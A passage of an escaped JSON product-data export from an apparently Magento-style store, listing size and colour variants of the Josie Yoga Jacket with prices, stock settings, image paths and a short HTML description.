"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1179\":{\"sku\":\"WJ02-S-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Josie Yoga Jacket-S-Gray\",\"description\":\"<p>When your near future includes yoga, the cozy comfort of the Josie Yoga Jacket gets your mind and body ready. Stretchy CoolTech&trade; fabric with zipper pockets makes this jacket the right gear for studio time or teatime after.<\\/p>\\n<p>&bull; Slate rouched neck pullover.<br \\/>&bull; Moisture-wicking fabric.<br \\/>&bull; Hidden zipper.<br \\/>&bull; Mesh armpit venting.<br \\/>&bull; Dropped rear hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.25\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"josie-yoga-jacket-s-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj02-gray_alt1.jpg,\\/w\\/j\\/wj02-gray_back.jpg\",\"image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj02-gray_alt1.jpg,\\/w\\/j\\/wj02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Gray\"},\"1180\":{\"sku\":\"WJ02-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Josie Yoga Jacket-M-Black\",\"description\":\"<p>When your near future includes yoga, the cozy comfort of the Josie Yoga Jacket gets your mind and body ready. Stretchy CoolTech&trade; fabric with zipper pockets makes this jacket the right gear for studio time or teatime after.<\\/p>\\n<p>&bull; Slate rouched neck pullover.<br \\/>&bull; Moisture-wicking fabric.<br \\/>&bull; Hidden zipper.<br \\/>&bull; Mesh armpit venting.<br \\/>&bull; Dropped rear hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.25\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"josie-yoga-jacket-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"1181\":{\"sku\":\"WJ02-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Josie Yoga Jacket-M-Blue\",\"description\":\"<p>When your near future includes yoga, the cozy comfort of the Josie Yoga Jacket gets your mind and body ready. Stretchy CoolTech&trade; fabric with zipper pockets makes this jacket the right gear for studio time or teatime after.<\\/p>\\n<p>&bull; Slate rouched neck pullover.<br \\/>&bull; Moisture-wicking fabric.<br \\/>&bull; Hidden zipper.<br \\/>&bull; Mesh armpit venting.<br \\/>&bull; Dropped rear hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.25\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"josie-yoga-jacket-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1182\":{\"sku\":\"WJ02-M-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Josie Yoga Jacket-M-Gray\",\"description\":\"<p>When your near future includes yoga, the cozy comfort of the Josie Yoga Jacket gets your mind and body ready. Stretchy CoolTech&trade; fabric with zipper pockets makes this jacket the right gear for studio time or teatime after.<\\/p>\\n<p>&bull; Slate rouched neck pullover.<br \\/>&bull; Moisture-wicking fabric.<br \\/>&bull; Hidden zipper.<br \\/>&bull; Mesh armpit venting.<br \\/>&bull; Dropped rear hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.25\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"josie-yoga-jacket-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj02-gray_alt1.jpg,\\/w\\/j\\/wj02-gray_back.jpg\",\"image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj02-gray_alt1.jpg,\\/w\\/j\\/wj02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},\"1183\":{\"sku\":\"WJ02-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Josie Yoga Jacket-L-Black\",\"description\":\"<p>When your near future includes yoga, the cozy comfort of the Josie Yoga Jacket gets your mind and body ready. Stretchy CoolTech&trade; fabric with zipper pockets makes this jacket the right gear for studio time or teatime after.<\\/p>\\n<p>&bull; Slate rouched neck pullover.<br \\/>&bull; Moisture-wicking fabric.<br \\/>&bull; Hidden zipper.<br \\/>&bull; Mesh armpit venting.<br \\/>&bull; Dropped rear hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.25\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"josie-yoga-jacket-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"1184\":{\"sku\":\"WJ02-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Josie Yoga Jacket-L-Blue\",\"description\":\"<p>When your near future includes yoga, the cozy comfort of the Josie Yoga Jacket gets your mind and body ready. Stretchy CoolTech&trade; fabric with zipper pockets makes this jacket the right gear for studio time or teatime after.<\\/p>\\n<p>&bull; Slate rouched neck pullover.<br \\/>&bull; Moisture-wicking fabric.<br \\/>&bull; Hidden zipper.<br \\/>&bull; Mesh armpit venting.<br \\/>&bull; Dropped rear hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.25\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"josie-yoga-jacket-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1185\":{\"sku\":\"WJ02-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Josie Yoga Jacket-L-Gray\",\"description\":\"<p>When your near future includes yoga, the cozy comfort of the Josie Yoga Jacket gets your mind and body ready. Stretchy CoolTech&trade; fabric with zipper pockets makes this jacket the right gear for studio time or teatime after.<\\/p>\\n<p>&bull; Slate rouched neck pullover.<br \\/>&bull; Moisture-wicking fabric.<br \\/>&bull; Hidden zipper.<br \\/>&bull; Mesh armpit venting.<br \\/>&bull; Dropped rear hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.25\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"josie-yoga-jacket-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj02-gray_alt1.jpg,\\/w\\/j\\/wj02-gray_back.jpg\",\"image\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj02-gray_alt1.jpg,\\/w\\/j\\/wj02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"1186\":{\"sku\":\"WJ02-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Josie Yoga Jacket-XL-Black\",\"description\":\"<p>When your near future includes yoga, the cozy comfort of the Josie Yoga Jacket gets your mind and body ready. Stretchy CoolTech&trade; fabric with zipper pockets makes this jacket the right gear for studio time or teatime after.<\\/p>\\n<p>&bull; Slate rouched neck pullover.<br \\/>&bull; Moisture-wicking fabric.<br \\/>&bull; Hidden zipper.<br \\/>&bull; Mesh armpit venting.<br \\/>&bull; Dropped rear hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.25\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"josie-yoga-jacket-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj02-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"1187\":{\"sku\":\"WJ02-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Josie Yoga Jacket-XL-Blue\",\"description\":\"<p>When your near future includes yoga, the cozy comfort of the Josie Yoga Jacket gets your mind and body ready. Stretchy CoolTech&trade; fabric with zipper pockets makes this jacket the right gear for studio time or teatime after.<\\/p>\\n<p>&bull; Slate rouched neck pullover.<br \\/>&bull; Moisture-wicking fabric.<br \\/>&bull; Hidden zipper.<br \\/>&bull; Mesh armpit venting.<br \\/>&bull; Dropped rear hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 